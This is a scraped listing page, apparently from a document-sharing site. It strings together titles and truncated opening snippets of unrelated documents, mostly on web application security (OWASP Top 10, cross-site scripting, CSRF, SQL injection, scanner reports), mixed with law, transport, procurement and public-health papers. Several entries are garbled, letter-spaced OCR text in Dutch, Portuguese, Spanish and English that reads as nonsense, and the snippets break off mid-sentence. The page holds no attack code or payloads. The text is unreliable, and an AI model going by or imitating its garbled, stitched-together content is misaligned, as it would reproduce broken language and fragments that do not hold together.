WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY www.alliancetechpartners.com WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY More than 70% of all websites have vulnerabilities

More information

Web Application Security Assessment and Vulnerability Mitigation Tests

Web Application Security Assessment and Vulnerability Mitigation Tests White paper BMC Remedy Action Request System 7.6.04 Web Application Security Assessment and Vulnerability Mitigation Tests January 2011 www.bmc.com Contacting BMC Software You can access the BMC Software

More information

T c k D E GR EN S. R a p p o r t M o d u le Aa n g e m a a k t o p 19 /09 /2007 o m 09 :29 u u r BJB 06 013-0009 0 M /V. ja a r.

T c k D E GR EN S. R a p p o r t M o d u le Aa n g e m a a k t o p 19 /09 /2007 o m 09 :29 u u r BJB 06 013-0009 0 M /V. ja a r. D a t a b a n k m r in g R a p p o r t M Aa n g e m a a k t o p 19 /09 /2007 o m 09 :29 u u r I d e n t if ic a t ie v a n d e m S e c t o r BJB V o lg n r. 06 013-0009 0 V o o r z ie n in g N ie u w la

More information

Criteria for web application security check. Version 2015.1

Criteria for web application security check. Version 2015.1 Criteria for web application security check Version 2015.1 i Content Introduction... iii ISC- P- 001 ISC- P- 001.1 ISC- P- 001.2 ISC- P- 001.3 ISC- P- 001.4 ISC- P- 001.5 ISC- P- 001.6 ISC- P- 001.7 ISC-

More information

Chapter 1 Web Application (In)security 1

Chapter 1 Web Application (In)security 1 Introduction xxiii Chapter 1 Web Application (In)security 1 The Evolution of Web Applications 2 Common Web Application Functions 4 Benefits of Web Applications 5 Web Application Security 6 "This Site Is

More information

CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities

CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities Thomas Moyer Spring 2010 1 Web Applications What has changed with web applications? Traditional applications

More information

THE UNIVERSITY OF SAN DIEGO CRIMINAL CLINIC: IT'S ALL IN THE MIX

THE UNIVERSITY OF SAN DIEGO CRIMINAL CLINIC: IT'S ALL IN THE MIX FILE:N:\DTP\MISS\LEAD.RAW Jan 01/10/06 Tue 10:20AM THE UNIVERSITY OF SAN DIEGO CRIMINAL CLINIC: IT'S ALL IN THE MIX Jean Montoya * Although many legal educators would place the birth of clinical legal

More information

SCO TT G LEA SO N D EM O Z G EB R E-

SCO TT G LEA SO N D EM O Z G EB R E- SCO TT G LEA SO N D EM O Z G EB R E- EG Z IA B H ER e d it o r s N ) LICA TIO N S A N D M ETH O D S t DVD N CLUDED C o n t e n Ls Pr e fa c e x v G l o b a l N a v i g a t i o n Sa t e llit e S y s t e

More information

A Practical Usage of Innovative Web Design Methodology: The Relational Modeling Methodology

A Practical Usage of Innovative Web Design Methodology: The Relational Modeling Methodology Abstract The web platform has transformed itself in the few years since its inception in 1993 from an instrument used merely to establish on-line presence to a platform that can support all facets of organizational

More information

Web Application Attacks and Countermeasures: Case Studies from Financial Systems

Web Application Attacks and Countermeasures: Case Studies from Financial Systems Web Application Attacks and Countermeasures: Case Studies from Financial Systems Dr. Michael Liu, CISSP, Senior Application Security Consultant, HSBC Inc Overview Information Security Briefing Web Applications

More information

Web Application Report

Web Application Report Web Application Report This report includes important security information about your Web Application. Security Report This report was created by IBM Rational AppScan 8.5.0.1 11/14/2012 8:52:13 AM 11/14/2012

More information

C o m p u te r M o d e lin g o f M o le c u la r E le c tro n ic S tru c tu re

C o m p u te r M o d e lin g o f M o le c u la r E le c tro n ic S tru c tu re C o m p u te r M o d e lin g o f M o le c u la r E le c tro n ic S tru c tu re P e te r P u la y D e p a rtm e n t o f C h e m is try a n d B io c h e m is try, U n iv e rs ity o f A rk a n s a s, F a

More information

First A S E M R e c to rs C o n f e re n c e : A sia E u ro p e H ig h e r E d u c a tio n L e a d e rsh ip D ia l o g u e Fre ie U n iv e rsitä t, B e rl in O c to b e r 2 7-2 9 2 0 0 8 G p A G e e a

More information

B R T S y s te m in S e o u l a n d In te g r a te d e -T ic k e tin g S y s te m

B R T S y s te m in S e o u l a n d In te g r a te d e -T ic k e tin g S y s te m Symposium on Public Transportation in Indian Cities with Special focus on Bus Rapid Transit (BRT) System New Delhi 20-21 Jan 2010 B R T S y s te m in S e o u l a n d In te g r a te d e -T ic k e tin g

More information

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh Web applications Web security: web basics Myrto Arapinis School of Informatics University of Edinburgh HTTP March 19, 2015 Client Server Database (HTML, JavaScript) (PHP) (SQL) 1 / 24 2 / 24 URLs HTTP

More information

re:think creativity ICT and tourism: gaming and creative technologies & applications

re:think creativity ICT and tourism: gaming and creative technologies & applications re:think creativity ICT and tourism: gaming and creative technologies & applications Presented by: Dr. N ik o s V o g ia t zis Corallia co-founder & chief Development & Operations officer gi-cluster Governance

More information

What is Web Security? Motivation

What is Web Security? Motivation brucker@inf.ethz.ch http://www.brucker.ch/ Information Security ETH Zürich Zürich, Switzerland Information Security Fundamentals March 23, 2004 The End Users View The Server Providers View What is Web

More information

1.- L a m e j o r o p c ió n e s c l o na r e l d i s co ( s e e x p li c a r á d es p u é s ).

1.- L a m e j o r o p c ió n e s c l o na r e l d i s co ( s e e x p li c a r á d es p u é s ). PROCEDIMIENTO DE RECUPERACION Y COPIAS DE SEGURIDAD DEL CORTAFUEGOS LINUX P ar a p od e r re c u p e ra r nu e s t r o c o rt a f u e go s an t e un d es a s t r e ( r ot u r a d e l di s c o o d e l a

More information

Web application security

Web application security Web application security Sebastian Lopienski CERN Computer Security Team openlab and summer lectures 2010 (non-web question) Is this OK? int set_non_root_uid(int uid) { // making sure that uid is not 0

More information

P R E F E I T U R A M U N I C I P A L D E J A R D I M

P R E F E I T U R A M U N I C I P A L D E J A R D I M D E P A R T A M E N T O D E C O M P R A S E L I C I T A O A U T O R I Z A O P A R A R E A L I Z A O D E C E R T A M E L I C I T A T с R I O M O D A L I D A D E P R E G O P R E S E N C I A L N 034/ 2 0

More information

2,000 Websites Later Which Web Programming Languages are Most Secure?

2,000 Websites Later Which Web Programming Languages are Most Secure? 2,000 Websites Later Which Web Programming Languages are Most Secure? Jeremiah Grossman Founder & Chief Technology Officer 2010 WhiteHat Security, Inc. WhiteHat Security Founder & Chief Technology Officer

More information

Simon Fraser University. Web Security. Dr. Abhijit Sen CMPT 470

Simon Fraser University. Web Security. Dr. Abhijit Sen CMPT 470 Web Security Dr. Abhijit Sen 95% of web apps have Vulnerabilities Cross-site scripting (80 per cent) SQL injection (62 per cent) Parameter tampering (60 per cent) http://www.vnunet.com/vnunet/news/2124247/web-applicationswide-open-hackers

More information

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION External Vulnerability Assessment -Technical Summary- Prepared for: ABC ORGANIZATI On March 9, 2008 Prepared by: AOS Security Solutions 1 of 13 Table of Contents Executive Summary... 3 Discovered Security

More information

Magento Security and Vulnerabilities. Roman Stepanov

Magento Security and Vulnerabilities. Roman Stepanov Magento Security and Vulnerabilities Roman Stepanov http://ice.eltrino.com/ Table of contents Introduction Open Web Application Security Project OWASP TOP 10 List Common issues in Magento A1 Injection

More information

Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure

Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure Vulnerabilities, Weakness and Countermeasures Massimo Cotelli CISSP Secure : Goal of This Talk Security awareness purpose Know the Web Application vulnerabilities Understand the impacts and consequences

More information

Application Layer Encryption: Protecting against Application Logic and Session Theft Attacks. Whitepaper

Application Layer Encryption: Protecting against Application Logic and Session Theft Attacks. Whitepaper Application Layer Encryption: Protecting against Application Logic and Session Theft Attacks Whitepaper The security industry has extensively focused on protecting against malicious injection attacks like

More information

Purpose of presentation

Purpose of presentation ECONOMIC REGULATION Purpose of presentation To provide the Status Quo on Economic Regulation To indicate the ideal situation WHERE DOES THE MANDATE COME FROM? Constitution Water Services Act Section 10

More information

E S T A D O D O C E A R Á P R E F E I T U R A M U N I C I P A L D E C R U Z C Â M A R A M U N I C I P A L D E C R U Z

E S T A D O D O C E A R Á P R E F E I T U R A M U N I C I P A L D E C R U Z C Â M A R A M U N I C I P A L D E C R U Z C O N C U R S O P Ú B L I C O E D I T A L N º 0 0 1 / 2 0 1 2 D i s p õ e s o b r e C o n c u r s o P ú b l i c o p a r a p r o v i m e n t o c a r g o s e v a g a s d a P r e f e i t u r a M u n i c i

More information

Cross-Site Scripting

Cross-Site Scripting Cross-Site Scripting (XSS) Computer and Network Security Seminar Fabrice Bodmer (fabrice.bodmer@unifr.ch) UNIFR - Winter Semester 2006-2007 XSS: Table of contents What is Cross-Site Scripting (XSS)? Some

More information

Web Application Vulnerability Testing with Nessus

Web Application Vulnerability Testing with Nessus The OWASP Foundation http://www.owasp.org Web Application Vulnerability Testing with Nessus Rïk A. Jones, CISSP rikjones@computer.org Rïk A. Jones Web developer since 1995 (16+ years) Involved with information

More information

Sichere Software- Entwicklung für Java Entwickler

Sichere Software- Entwicklung für Java Entwickler Sichere Software- Entwicklung für Java Entwickler Dominik Schadow Senior Consultant Trivadis GmbH 05/09/2012 BASEL BERN LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR. HAMBURG MÜNCHEN STUTTGART

More information

Creating a best fit between Business Strategy and Web Services Capabilities using Problem Frames Modeling approach

Creating a best fit between Business Strategy and Web Services Capabilities using Problem Frames Modeling approach Creating a best fit between Business Strategy and Web Services Capabilities using Problem Frames Modeling approach Anju Jha 1, Karl Cox 2 & Keith T. Phalp 3 1 School of Computer Science and Engineering

More information

Testing the OWASP Top 10 Security Issues

Testing the OWASP Top 10 Security Issues Testing the OWASP Top 10 Security Issues Andy Tinkham & Zach Bergman, Magenic Technologies Contact Us 1600 Utica Avenue South, Suite 800 St. Louis Park, MN 55416 1 (877)-277-1044 info@magenic.com Who Are

More information

Web Application Security

Web Application Security E-SPIN PROFESSIONAL BOOK Vulnerability Management Web Application Security ALL THE PRACTICAL KNOW HOW AND HOW TO RELATED TO THE SUBJECT MATTERS. COMBATING THE WEB VULNERABILITY THREAT Editor s Summary

More information

The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.

The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked. This sample report is published with prior consent of our client in view of the fact that the current release of this web application is three major releases ahead in its life cycle. Issues pointed out

More information

ArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young

ArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young ArcGIS Server Security Threats & Best Practices 2014 David Cordes Michael Young Agenda Introduction Threats Best practice - ArcGIS Server settings - Infrastructure settings - Processes Summary Introduction

More information

BENEFITS OF AN INTEGRATED (PROSECUTION & DEFENSE) CRIMINAL LAW CLINIC

BENEFITS OF AN INTEGRATED (PROSECUTION & DEFENSE) CRIMINAL LAW CLINIC FILE:C:\WINDOWS\DESKTOP\MYBRIE~1\LINDAS.WP 01/10/06 Tue 10:22AM Jan BENEFITS OF AN INTEGRATED (PROSECUTION & DEFENSE) CRIMINAL LAW CLINIC Linda F. Smith * This article describes the University of Utah's

More information

FINAL DoIT 11.03.2015 - v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES

FINAL DoIT 11.03.2015 - v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES Purpose: The Department of Information Technology (DoIT) is committed to developing secure applications. DoIT s System Development Methodology (SDM) and Application Development requirements ensure that

More information

Passing PCI Compliance How to Address the Application Security Mandates

Passing PCI Compliance How to Address the Application Security Mandates Passing PCI Compliance How to Address the Application Security Mandates The Payment Card Industry Data Security Standards includes several requirements that mandate security at the application layer. These

More information

Advanced Web Technology 10) XSS, CSRF and SQL Injection 2

Advanced Web Technology 10) XSS, CSRF and SQL Injection 2 Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 Table of Contents Cross Site Request Forgery - CSRF Presentation

More information

1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications

1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications 1. Introduction 2. Web Application 3. Components 4. Common Vulnerabilities 5. Improving security in Web applications 2 What does World Wide Web security mean? Webmasters=> confidence that their site won

More information

Web Application Worms & Browser Insecurity

Web Application Worms & Browser Insecurity Web Application Worms & Browser Insecurity Mike Shema Welcome Background Hacking Exposed: Web Applications The Anti-Hacker Toolkit Hack Notes: Web Security Currently working at Qualys

More information

Public Health is Like..

Public Health is Like.. Public Health is Like.. A box of chocolates. you never know what your gonna get, Forrest Gump. So... Build the evidence-base for public health practice Building the Evidence- Base Science is contributing

More information

Learn Ethical Hacking, Become a Pentester

Learn Ethical Hacking, Become a Pentester Learn Ethical Hacking, Become a Pentester Course Syllabus & Certification Program DOCUMENT CLASSIFICATION: PUBLIC Copyrighted Material No part of this publication, in whole or in part, may be reproduced,

More information

Unit 16 : Software Development Standards O b jec t ive T o p r o v id e a gu ide on ho w t o ac h iev e so f t wa r e p r o cess improvement through the use of software and systems engineering standards.

More information

Introduction:... 1 Security in SDLC:... 2 Penetration Testing Methodology: Case Study... 3

Introduction:... 1 Security in SDLC:... 2 Penetration Testing Methodology: Case Study... 3 Table of Contents Introduction:... 1 Security in SDLC:... 2 Penetration Testing Methodology: Case Study... 3 Information Gathering... 3 Vulnerability Testing... 7 OWASP TOP 10 Vulnerabilities:... 8 Injection

More information